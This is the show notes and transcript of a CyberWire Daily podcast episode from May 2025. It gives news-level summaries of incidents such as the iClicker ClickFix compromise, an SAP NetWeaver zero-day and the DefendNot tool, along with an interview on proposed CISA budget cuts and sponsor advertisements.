CyberWire Daily - No quick fix for a ClickFix attack.
Episode Date: May 12, 2025A major student engagement platform falls victim to the ClickFix social engineering attack. Google settles privacy allegations with Texas for over one point three billion dollars. Stores across the UK... face empty shelves due to an ongoing cyberattack. Ascension Health reports that over 437,000 patients were affected by a third-party data breach. A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. U.S. prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, Senior Reporter from CyberScoop, discusses congressional reactions to White House budget cut proposals for CISA. Fair use faces limits in generative AI. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest We welcome back Tim Starks, Senior Reporter from CyberScoop, discussing congressional reactions to White House budget cut proposals for CISA. You can find background information in these articles: House appropriators have reservations — or worse — about proposed CISA cuts Sen. Murphy: Trump administration has ‘illegally gutted funding for cybersecurity’ Selected Reading iClicker website compromised with fake ClickFix CAPTCHA installing malware (BeyondMachines.net) Google Agrees to $1.3 Billion Settlement in Texas Privacy Lawsuits (SecurityWeek) Fears 'hackers still in the system' leave Co-op shelves running empty across UK (The Record) 437,000 Impacted by Ascension Health Data Breach (SecurityWeek) SAP NetWeaver Vulnerability Exploited in Wild by Chinese Hackers (Cyber Security News) New SEO Poisoning Campaign Targeting IT Admins With Malware (Hackread) Three Russians, one Kazakhstani charged in takedown of Anyproxy and 5socks botnets (The Record) Defendnot — A New Tool That Disables Windows Defender by Posing as an Antivirus Solution (Cyber Security News) Five Takeaways from the Copyright Office’s Controversial New AI Report (Copyright Lately) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here’s our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the CyberWire Network powered by N2K.
Hey everybody, Dave here.
Join me and my guests, Outpost 24's Laura Enriquez and Michelo Steppa on Tuesday, May
13th at noon Eastern time for a live discussion on the biggest threats hitting web applications
today and what you can do about them. We're going to talk about why attackers still
love web apps in 2025, the latest threat trends shaping the security landscape, how
to spot and prioritize critical vulnerabilities fast, along with scalable
practical steps to strengthen your defenses. Again, the webinar is Tuesday,
May 13th for our live conversation on the state
of modern web application security. You can register now by visiting events.thescyberwire.com.
That's events.thescyberwire.com. We'll see you there.
Hey, everybody. Dave here. I've talked about DeleteMe before, and I'm still using it because it still works.
It's been a few months now, and I'm just as impressed today as I was when I signed
up.
DeleteMe keeps finding and removing my personal information from data broker sites, and they
keep me updated with detailed reports, so I know exactly what's been taken down.
I'm genuinely relieved knowing my privacy isn't something I have to worry about every
day.
The DeleteMe team handles everything.
It's the set it and forget it piece of mind.
And it's not just for individuals.
DeleteMe also offers solutions for businesses, helping companies protect their employees'
personal information,
and reduce exposure to social engineering and phishing threats.
And right now, our listeners get a special deal, 20% off your DeleteMe plan.
Just go to joindeleteeme.com slash n2k and use promo code N2K at checkout.
That's joindeleteeme.com slash n2k, code N2K at checkout. That's joindeleteme.com slash N2K code N2K.
A major student engagement platform falls victim to the click-fix social engineering
attack.
Google settles privacy allegations with Texas for over $1.3 billion.
Stores across the UK face empty shelves due to an ongoing cyberattack.
Ascension Health reports that over 437,000 patients were affected by a third-party data
breach. A critical zero-day vulnerability in SAP NetWeaver
is being actively exploited.
Researchers uncover two major cybersecurity threats
targeting IT admins and cloud systems.
US prosecutors charge three Russians and one Kazakhstani
in connection with the takedown of two major botnets.
A new tool disables Microsoft Defender
by tricking Windows into thinking
a legitimate antivirus is installed.
Tim Starks, senior reporter from Cyberscoop,
discusses congressional reactions
to White House budget cut proposals for CISA,
and fair use faces limits in generative AI. It's Monday, May 12, 2025.
I'm Dave Bittner and this is your CyberWire Intel Briefing. Happy Monday and thanks for joining us here today.
It is great to have you with us.
iClicker is a student engagement platform used by about 5,000 instructors and 7 million
students at U.S. colleges, including major universities like
Michigan and Florida.
Between April 12 and the 16th of this year, its website was compromised in a click-fix
social engineering attack.
A fake captcha tricked visitors into running a malicious PowerShell script by copying it
from the clipboard into the Windows Run dialog.
Once executed, the script connected to a remote server to fetch more malware.
Depending on the visitor, the attack either gave hackers full access
or downloaded harmless software to avoid detection.
The likely payload was an information stealer, targeting credentials,
browser data, and cryptocurrency wallets.
iClicker confirmed the breach on May 6, stating its apps and data were unaffected and the
vulnerability had been fixed.
The number of affected users is still unknown.
Google will pay $1.375 billion to Texas to settle claims it secretly tracked users' locations, private
browsing activity, and biometric data without consent.
The lawsuit, led by Attorney General Ken Paxton, alleged that Google continued tracking users
even with location services off and used the data for advertising profits.
It also claimed Google collected biometric data like facial geometry without proper consent.
Google denies wrongdoing but has since updated its policies.
The settlement is one of the largest U.S. privacy-related fines.
Co-op stores across the UK are facing empty shelves due to an ongoing cyberattack that began two weeks
ago. Fearing hackers may still have access, the company has kept key logistics systems
offline, severely disrupting deliveries. Staff report depot shipments are below 20 percent
of normal, with meat, dairy, and eggs prioritized due to perishability laws. Other items like produce, canned goods,
and cigarettes remain scarce. CEO Shireen Khoury-Hawk confirmed customers and member
data was compromised, though the nature of the hack is still unclear. Despite all stores
remaining open, recovery is expected to take weeks. On the Scottish island of Islay, where Co-op is the only major grocer, special delivery
processes are in place.
Co-op, a member-owned cooperative, operates over 3,000 locations and does not have to
report financial losses to public markets.
Ascension Health reported that over 437,000 patients were affected by a data breach tied
to a third-party vendor's software vulnerability, not its own systems.
Hackers exploited this flaw to steal sensitive data, including names, contact details, social
security numbers, and health information.
The breach likely stemmed from the Klopp Ransomware Group's December 2023 attack on Clio's File
Transfer Platform.
Impacted patients are being offered two years of free credit monitoring.
This breach is smaller than Ascension's May 2024 ransomware incident, affecting 5.6 million.
A critical zero-day vulnerability in SAP NetWeaver is being actively exploited by Chinese state-sponsored
hackers.
The flaw, found in the Internet Communication Manager component, allows unauthenticated
remote code execution via crafted HTTP requests.
Despite emergency patches, many SAP systems remain exposed.
Attackers are targeting high-value sectors like finance and manufacturing to steal sensitive
data and establish persistent access.
Researchers found that custom malware, dubbed SAFIRE, uses encrypted communication over
SAP protocols, making detection difficult.
The attack chain begins with a malicious SOAP request that exploits memory corruption and
delivers a reverse shell.
From there, attackers modify SAP configurations to maintain access.
The sophisticated campaign raises concerns about supply chain risks and has already caused
operational disruptions across critical sectors including healthcare, government, and infrastructure.
Varonis has uncovered two major cybersecurity threats targeting IT admins and cloud systems.
First, attackers are using SEO poisoning to trick admins into downloading malware disguised as legitimate tools.
These fake downloads can install back
doors like smoked ham or monitoring software enabling credential theft and
data exfiltration. In one case nearly a terabyte of data was stolen followed by
a ransomware attack. Separately, Varonis found a critical root access flaw in
Azure's AZNFS mount utility used in HPC and AI workloads.
The bug lets unprivileged users escalate to root by exploiting environment variables.
Though Microsoft rated it low severity, the risk of full cloud compromise is significant.
Varonis urges immediate patching and recommends a defense-in-depth strategy to reduce exposure.
U.S. prosecutors have charged three Russians and one Kazakhstani in connection with a takedown
of two major botnets, any proxy, and five socks.
The suspects allegedly ran a malware campaign that hijacked outdated wireless routers, converting them
into proxy servers for rent on the seized websites.
The botnets offered over 7,000 proxies, generating $46 million over 20 years.
The operation, named Moonlander, involved international cooperation and technical analysis
from Lumen Technologies. Many infected routers were found in Oklahoma with global reach across over 80 countries.
The FBI warns that outdated routers, especially older Linksys, Cisco, and TP-Link models,
are prime targets for exploitation by threat actors, including Chinese hackers.
Two defendants also face charges of using false identities to register domains.
Authorities urge replacing unsupported routers to avoid similar compromises.
A new tool called DefendNot disables Microsoft Defender by exploiting the Windows Security
Center API, tricking Windows into thinking a legitimate
antivirus is installed.
Created by a GitHub developer, DefendNot registers a fake antivirus product using reverse-engineered
interactions with the undocumented WSC API, bypassing Microsoft's integrity checks by
injecting its code into trusted processes like Task Manager.
Once registered, Windows automatically disables Defender to avoid conflicts.
While the tool requires admin privileges and persistent installation to survive reboots,
it poses a risk if abused by malware developers.
Security experts warn that although DefendNot showcases impressive
technical skill, it highlights a significant security gap in how Windows handles AV product
registration. The tool builds on the developer's earlier project, Node Defender, and underscores
the need for better safeguards in WSC's architecture. Coming up after the break, my conversation with Tim Starks from CyberScoop discussing
congressional reactions to White House budget cut proposals for CISA and fair use faces
limits in generative AI.
Stick around.
And now, a word from our sponsor, ThreatLocker.
Keeping your system secure shouldn't mean constantly reacting to threats.
ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment.
If it's not approved, it doesn't run. Simple as that.
It's a way to stop ransomware and other attacks before they start without adding extra complexity to your day.
See how ThreatLocker can help you lock down your environment at www.threatlocker.com.
Let's be real.
Navigating security compliance can feel like assembling IKEA furniture without
the instructions. You know you need it, but it takes forever and you're never quite sure
if you've done it right. That's where Vanta comes in. Vanta is a trust management platform
that automates up to 90% of the work for frameworks like SOC 2, ISO 27001, and HIPAA, getting
you audit ready in weeks, not months.
Whether you're a founder, an engineer, or managing IT and security for the first time,
Vanta helps you prove your security posture without taking over your life.
More than 10,000 companies, including names like Atlassian and Quora, trust Vanta to monitor
compliance, streamline risk, and speed up
security reviews by up to five times. And the ROI? A recent IDC report found Vanta
saves businesses over half a million dollars a year and pays for itself in
just three months. For a limited time you can get a thousand dollars off Vanta at Vanta.com slash cyber that's
Vanta.com slash cyber
It is always my pleasure to welcome back to the show Tim Starks.
He is a senior reporter at CyberScoop.
Tim, welcome back.
It's great to be back.
So Tim, you have posted a couple of stories over on CyberScoop in the past week or so
looking at some of the proposed cuts to CISA and reactions from lawmakers about that. Can you unpack
some of your reporting here for us?
Yeah, sure. We start tail end of what would have been May 2nd, I think, where the administration
put out its skinny budget that they called it, basically lacking major details.
But it indicated that they would be looking to cut CISA's budget by $491 million, which
is, I think I estimated it was 17%.
Lawmakers have been saying close to 20%.
I think both are accurate.
But it's a pretty massive, pretty massive potential cut.
And the reasons they talked about doing this, they know, they don't go into a lot of
details, but they talk about this notion that the Trump administration has that the CISA
was part of the censorship industrial complex. We can talk more about whether that's true
or not in a second. But, you know, we saw some reaction from lawmakers first on the
House side, the appropriators. Democrats were very harsh about this cut.
They basically were saying this would be a killing blow
for the agency and other things.
The Republican chairman of the committee,
subcommittee of unholy insecurity, Mark Amadi,
had said, we need more details than this.
We're hearing that China and Russia are kicking our butts,
and here we are looking to cut this agency. So you need to really show us why you think we need to do that. And then continues on into later the week in which on Thursday of this week,
since it's time to do this, and the top Democrat on the Homeland Security Appropriations subcommittee,
Chris Murphy, said that this was an illegal gutting of cybersecurity at DHS to pay for the border
and that gets us up to speed. Well, let's go in a little reverse order then from where you laid
things out for us. Talking about Senator Murphy, what is the case that he's
making that these cuts might be illegal?
Yeah, he was painting with a broader brush when he said, when he was talking about the
powers of the purse that Congress has.
I mean, the idea is Congress appropriates money, the executive branch spends it.
And there have been a lot of things happening at CISA where cuts have
already happened to personnel, cuts have already happened to programs. There are talks about
even more cuts, potentially a thousand plus people at a 3,000 person agency. And Senator
Murphy's case was, this is illegal because you're ignoring congressional mandates.
Let's talk about Kristi Noem,
who has referred to CISA as playing the role
of the Ministry of Truth.
This rhetoric, I guess it feels old to me. I feel as though after the 2020 election and we had
members of Trump himself and of course his inner circle saying that the election was
fraudulent and all of those things, which as we know got played out in many, many courtrooms across the country. But my sense after all of that was that CISA was maybe out of self-interest
backing away from the misinformation role on their own.
And so it seems to me like this stuff coming from Kristi Noem is kind of
a solution in search of a problem.
I think that's a good characterization.
I'm trying not to editorialize here, but the administration,
the Biden administration, really backed off of anything it was doing on misinformation, disinformation,
which by the way, was at best a miniscule amount of the work
that the agency was doing. Then, the Secretary of Homeland Security herself
evicted anybody who was in the election security community amount of the work that the agency was doing. Then the Secretary of Homeland Security herself
evicted anybody who was in the election security community within CISA who was still working
on misinformation or disinformation anyway and explicitly related to election security.
And that was, I think, the most revealing exchange, even though we let our story with
Senator Murphy, was between Senator Peters and Christine Ohm,
with him basically saying, okay,
so you got rid of 15 people out of 3,000.
How are you trying to get the agency back on mission?
She says it is back on mission.
But that's contradicted by the fact that if you look at
what little information there is in
the Trump administration budget proposal for fiscal
2026, their major reason that they're saying that we need to cut back on this agency is
that it's being this ministry of truth kind of thing.
So it's a little confusing about whether they believe this is still going on and if so,
what ways?
I mean, there are other programs that people have singled out there.
DHS has also gotten rid of.
So things like monitoring unlike extremism.
DHS has cut contracts for that under this administration.
So you start to wonder where the $491 million comes from
and whether, to quote Lauren Underwood, the top Democrat
on the House Appropriations Subcommittee,
that this isn't about cutting fat.
This is about deep cuts.
And I think probably it's a justification you can use, especially to the right, if you're
saying we need to cut the size of government overall and CISA has 3,000 people, we're going
to have to cut some people there too. That's what it kind of feels like to me is that this is more
an excuse, but maybe they'll surprise us and when they finally do release the full budget,
which appropriators don't know when that's going to happen, they said at these two sessions.
Maybe they'll reveal what they're cutting and we'll say, oh, that's what they were
referring to.
Or at least it'll make a little bit of sense, whether you agree or disagree with their interpretation
of things, you'll at least be able to point out and say, I understand their reasoning.
Right now I don't understand their reasoning, frankly.
Yeah.
I mean, obviously I'm left scratching my own head.
Clearly our adversaries are not slowing down or dialing back their investments in misinformation
or their attempts to get into our systems.
So it would seem to me like the mission is as important as ever.
Yeah.
And on that front specifically, if you were saying, I'm concerned about the government
censoring American speech, well, they've gotten rid of State Department programs that are
focused on foreign misinformation campaigns.
So I don't know, it still doesn't make a lot of sense like we were talking about.
If you're concerned about Russia and China,, to their credit, despite the issues that this president
has had with Russia and whether he's too close to it, the CISA has stood by and said, we
believe Russia is a cyber threat.
So if you think they're threats, why would you cut these agencies?
They need to do a better job, I think, than they have so far to convince me that they
have a case.
And that's always what comes out of my baseline as a reporter, like, do they have a case? And then you make the case in a story,
you explain that case.
You let me decide, but right now I don't hear a case.
It doesn't make sense.
Well, when we look at proposed leadership for CISA,
is it possible that we could find ourselves
in a situation where we have a leader
who shields the workers from all of this political rhetoric
and just says, hey, everybody, heads down, we're going to continue our important work.
We're going to make the most of the funds we have.
Let me take all of the heat on all of this political stuff, but we've got work to do.
I think it's possible.
I think we actually saw that under the first Trump administration.
Chris Krabs, at least until the very end,
did a good job of keeping CISA off of the president's radar.
And the nominee for the CISA job is Sean Planky.
He has a good reputation out there in the cyber world,
left and right.
He's considered a smart operator.
So we'll see what he does, you know, when the
time comes that he does have his hearing, what kind of things he'll say to walk this tightrope
of, you know, wanting to run an agency that you believe in, but also having it being cut under
your feet by your own president. We'll see what he can get done. I think it's at least possible
that he can mitigate some of these things. I think there was another hearing that I tuned into a little bit this week where Cash Patel,
who is probably as loyalist as it gets to Trump, was saying that the FBI needed more
money than the budget proposal.
So if he's saying it, I wonder if somebody who's less ideologically aligned, and I don't
mean to say that Trump Planky's not conservative
because my understanding is that he is.
But if somebody who's less ideologically aligned
to this MAGA movement,
maybe that person can find a way to walk that tightrope.
Yeah.
All right, well, we will have links
to all of Tim's reporting on these topics in our show notes.
Tim Starks is senior reporter at CyberScoop.
Tim, thanks so much for taking the time for us.
Thank you, Dave.
What's the common denominator in security incidents?
Escalations and lateral movement.
When a privileged account is compromised, attackers can seize control of critical assets.
With bad directory hygiene and years of technical debt, identity attack paths are easy targets
for threat actors to exploit but hard for defenders to detect.
This poses risk in active directory, Entra ID, and hybrid configurations.
Identity leaders are reducing such risks with Attack Path Management.
You can learn how Attack Path Management is connecting identity and security teams while reducing risk with Bloodhound Enterprise, powered by SpectorOps.
Head to spectorops.io today to learn more.
SpectorOps, see your attack paths the way adversaries do.
And finally, late last Friday, in a move as quietly timed as it was politically charged, the U.S. Copyright Office released a pre-publication version of Part 3 of its AI study, just hours
before its top leadership was abruptly dismissed.
The 108-page report tackles how copyright law, especially fair use, should apply to
AI training.
It argues that copying during training is presumptively infringing, and that even the
model's weights may embed protected expression.
The report emphasizes that fair use hinges on how the AI is ultimately used, not just
how it's trained.
Particularly striking is the Office's endorsement of a novel market dilution theory, warning
that AI-generated content could flood and devalue markets, even without direct copying.
While courts are not bound by the report, its detailed reasoning
could shape the over 40 ongoing copyright cases involving generative AI. Whether the
report survives changing political winds remains uncertain, but its legal implications are
already rippling outward.
And that's the CyberWire.
For links to all of today's stories, check out our daily briefing at the cyberwire.com.
Don't forget to check out the Grumpy Old Geeks podcast where I contribute to a regular segment
on Jason and Brian's show every week.
You can find Grumpy Old Geeks where all the fine podcasts are listed.
We'd love to know what you think of this podcast.
Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly
changing world of cybersecurity.
If you like our show, please share a rating and review in your favorite podcast app. Please also
fill out the survey and the show notes or send an email to cyberwire at n2k.com.
N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're
mixed by Trey Hester with original music and sound design by Elliot Peltsman.
Our executive producer is Jennifer Iben, Peter Kilpe as our publisher, and I'm Dave Bittner.
Thanks for listening.
We'll see you back here, tomorrow. And now a word from our sponsor, Spy Cloud.
Identity is the new battleground, and attackers are exploiting stolen identities
to infiltrate your organization.
Traditional defenses can't keep up.
Spy Cloud's holistic identity threat protection
helps security teams uncover
and automatically remediate hidden exposures
across your users from breaches, malware, and phishing
to neutralize identity-based threats
like account takeover,
fraud and ransomware.
Don't let invisible threats compromise your business.
Get your free corporate darknet exposure report at spycloud.com slash cyberwire and see what
attackers already know.
That's spycloud.com slash cyberwire.